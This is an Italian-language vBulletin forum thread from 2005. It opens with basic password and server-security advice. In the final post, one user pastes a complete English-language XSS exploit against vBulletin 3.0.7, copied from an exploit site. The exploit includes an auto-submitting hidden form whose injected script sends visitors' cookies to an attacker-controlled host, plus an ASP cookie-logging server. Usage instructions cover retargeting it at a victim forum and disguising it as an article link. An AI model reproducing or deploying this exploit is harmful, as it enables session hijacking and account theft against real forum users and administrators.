Risultati da 11 a 20 di 22
-
22-07-2005, 15:35 #11
Per poter "rovinare" il forum, influiscono i seguenti fattori:
- Accesso FTP: verificare che username e password sono difficili da indovinare, la password composta possibilmente da almeno 8 caratteri più o meno casuali, maiuscole e minuscole miste assieme ai numerici (x2lm3vgc sarebbe una buona password, ad esempio). Se un hacker riesce a prendere in possesso il sito tramite FTP, può cancellare gli script e gli allegati, avatar ecc, ma non può modificare il database, a meno che questo non sia accessibile tramite FTP (spero di no!!!).
- Accesso MySQL: vale la stessa cosa per le password come per FTP. Se un hacker può fare il login al database, può distruggere tutto, tranne gli script e gli allegati.
- Accesso a vBulletin: idem per la password. Può distruggere tutto tranne gli script.
Per quanto riguarda il server, è necessario che sia ben protetto e che abbia i filtri principali contro troian e vari attacchi installati. Esistono siti esterni, che permettono di simulare un attacco, e rivelano tutte le possibili falle del proprio sistema. Con l'aiuto di questi siti si riesce a 'tappare' ogni buco e risolvere la maggioranza dei problemi alla radice.Giovanni
http://www.trimelli.com/
Per favore non mandatemi PM, ma scrivete sul forum. Vi sarà risposto prima.
-
25-07-2005, 18:17 #12
Ragazzi, la parolina LAMER vi dice qualcosina?
-
26-07-2005, 23:26 #13
- Data Registrazione
- Jan 2005
- Località
- Vicopisano [PI]
- Età
- 47
- Messaggi
- 46
Originariamente Scritto da y2ksw
-
04-09-2005, 11:46 #14
- Data Registrazione
- Feb 2005
- Messaggi
- 36
sicuri che non è possibile bucarlo?? con la versione 3.0.7 esiste un exploit... non posso postarlo in quanto questo non è un sito hacker.... però il sistema ci sta e proprio tramite vbulletin, senza passare ne dall'hoster, ne da ftp ne usando accessi da admin (quelli li prendi con l'exploit)....
-
04-09-2005, 13:50 #15
Originariamente Scritto da King
Originariamente Scritto da hokar
mossss
OnlyFocus.com
Discussioni: 9,236, Messaggi: 493,085, Utenti: 2,011
powered by vBulletin 3.6.0 + vBadvanced CMPS 2.2 + Coppermine Gallery v1.4.8
Vi prego di NON mandare email/PM per chiedere supporto, usate il forum!!!
-
05-09-2005, 11:37 #16
- Data Registrazione
- Feb 2005
- Messaggi
- 36
vorrei darvi più dettagli, ma l'unico modo che lo possiate capire, è che vi posto l'exploit direttamente!! Si passa tramite XSS.... mi spiace che non posso esserve di aiuto ma non lo conosco come exploit... sò che esiste, sò dove prenderlo, ma non ci capisco nulla :-|
-
05-09-2005, 13:59 #17
Originariamente Scritto da hokar
mha...mossss
OnlyFocus.com
Discussioni: 9,236, Messaggi: 493,085, Utenti: 2,011
powered by vBulletin 3.6.0 + vBadvanced CMPS 2.2 + Coppermine Gallery v1.4.8
Vi prego di NON mandare email/PM per chiedere supporto, usate il forum!!!
-
05-09-2005, 19:35 #18
Ho la vaga idea che si tratta di un exploit umano: chi ci crede?
Non ci possono essere delle cose gravissime che si possono fare con questo exploit, altrimenti avremmo sentito le campane da mille parti. Sicuramente è applicabile soltanto in casi eccezionali, con una lunga catena di "se", tipo: se il sistema operativo non è aggiornato, e se l'impostazione del forum è fatta in tal modo, e se ... allora si può entrare.
Certo, togliendo tutte le protezioni chiunque può fare quel che gli pare.Giovanni
http://www.trimelli.com/
Per favore non mandatemi PM, ma scrivete sul forum. Vi sarà risposto prima.
-
05-09-2005, 19:36 #19
- Data Registrazione
- Feb 2005
- Messaggi
- 36
io ve lo posto, poi se lo volete levare lo levate... okey??
-
05-09-2005, 19:42 #20
- Data Registrazione
- Feb 2005
- Messaggi
- 36
è in inglese per cui... dovrete tradurre tutto voi.. come vi ho detto nn capisco na mazza, ma l'ho preso da un sito dove hanno solo exploit...
first off lets look at the code involved:
Codice:<html> <head> <title> </title> </head> <script language = "JavaScript"> function autosubmit() { document.vbform.submit(); self.close; } function settime() { window.open("http://www.naasalansar.com",null,& #34;height=900,width=1100,status=yes,toolbar=yes,menubar=yes,resizable=yes,locat ion=yes,scrollbars=yes"); setTimeout("autosubmit()", 0.25); } </script> <body onLoad="settime()"> <script type="text/javascript"> <!-- function checkpm(formname) { var result = validatePost(formname, formname.title.value, 0, 5000); if (result == false) { formname.dopreview = false; return result; } else if (formname.dopreview != true) { if (confirm("Request a read receipt for this message?")) { formname.receipt.value = 1; } } return result; } //--> </script> <form action="http://path.to.vbulletin/private.php" method="post" name="vbform" onsubmit="return checkpm(this)"> <input type ="hidden" name="preview" value="Preview+Message" /> <input type="hidden" name="recipients" value="" /> <input type="hidden" name="title" value="<script>location.href='http://192.168.1.2/?ac='+document.cookie</script>" /> <input type="hidden" name="WYSIWYG_HTML" id="html_hidden_field" value="rawd al jinan sawt al hisan" /> <input type="hidden" name="s" value="" /> <input type="hidden" name="do" value="insertpm" /> <input type="hidden" name="pmid" value="" /> <input type="hidden" name="forward" value="" /> <input type="hidden" name="receipt" value="0" /> <input type="hidden" class="hidden" name="sbutton" value="Submit Message" accesskey="s" tabindex="1" /> <input type="hidden" class="button" value="Preview Message" accesskey="p" name="preview" tabindex="1" onclick="this.form.dopreview = true; return true;" /> </form> </body> </html>
we all know the XSS ability in PREVIEWING a PM so i made a hidden form which auto submits and posts the same data as the exploit.
ok so here is how to use:
change the names in the code to point to your domain. at the top you will see:
Codice:window.open("http://www.naasalansar.com",null,& #34;height=900,width=1100,status=yes,toolbar=yes,menubar=yes,resizable=yes,locat ion=yes,scrollbars=yes");
this isnt neccesary as all the XSS is done hidden.
here are some other things you have to change:
Codice:<form action="http://path.to.vbulletin/private.php" method="post" name="vbform" onsubmit="return checkpm(this)">
Codice:<input type="hidden" name="title" value="<script>location.href='http://192.168.1.2/?ac='+document.cookie</script>" />
Codice:<input type="hidden" name="WYSIWYG_HTML" id="html_hidden_field" value="rawd al jinan sawt al hisan" />
Codice:<input type="hidden" name="receipt" value="0" />
because i HAVENT been able to spoof the header you will have to put the file in a document repository or something to FORCE the download box to appear. because when the browser opens the new window there is no previous URL hence no referer hence no validation check smile.gif
now on my SERVER i used ASP:
Codice:index.asp: <%@LANGUAGE="VBSCRIPT" CODEPAGE="1252"%> <% dim conn, rs, getstring, SQLStmt, cStr, DBQ getstring = request.QueryString("ac") if len("getstring") > 1 then set conn= server.CreateObject("ADODB.Connection") set rs = server.CreateObject("ADODB.Recordset") conn.Open ("DRIVER=Mcft Access Driver (*.mdb);DBQ=" & Server.MapPath("/db/poster.mdb")) SQLStmt = "SELECT * FROM cookie" RS.Open SQLStmt, Conn, 3, 3 rs.AddNew rs("cookie") = getstring rs.update rs.close end if set conn=nothing set rs=nothing %> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Cross Site Script!! WOOOOOT!</title> </head> <body> <% set conn = server.CreateObject("ADODB.Connection") conn.Open ("DRIVER=Mcft Access Driver (*.mdb);DBQ=" & Server.MapPath("/mafiastylegangs/db/poster.mdb")) set rs = server.createobject("ADODB.recordset") sql = "Select * from cookie" RS.Open sql, Conn, 3, 3 do until rs.eof %> <b><%=rs("cookie")%></b><br><BR> <% rs.movenext loop rs.close dim admin admin =request.querystring("admin") if not admin="yes" then response.redirect("http://www.naasalansar.com") %> </body> </html>
it has a simple protection feature if the querystring admin = yes then i can view the cookies rather than having it log it...
but if its empty then the cookie will be logged to the database and redirected to your final site...
so if i say "check out this article:"
then your final redirect should look like:
Codice:if not admin="yes" then response.redirect("http://www.timesonline.com/blahblahblah.html")
thats all for now... there is only so much detail one man can take lol
btw you might want to modify this line to something less conspicuous:
Codice:<title>Cross Site Script!! WOOOOOT!</title>
spoof the header to the domain of ure victim forum so the person doenst have to download the file but just click on a link instead.
thats all i can think offcheers
------------------------------------------------------------------------------------
End of exploit
by: barodate
thanks to every1 at h4cky0u!!!!
i know its rather long but maybe some of the l337 coders here can make it a perl script or something...
enjoy
Ecco a voi, quello è tutto l'eploit...
Segnalibri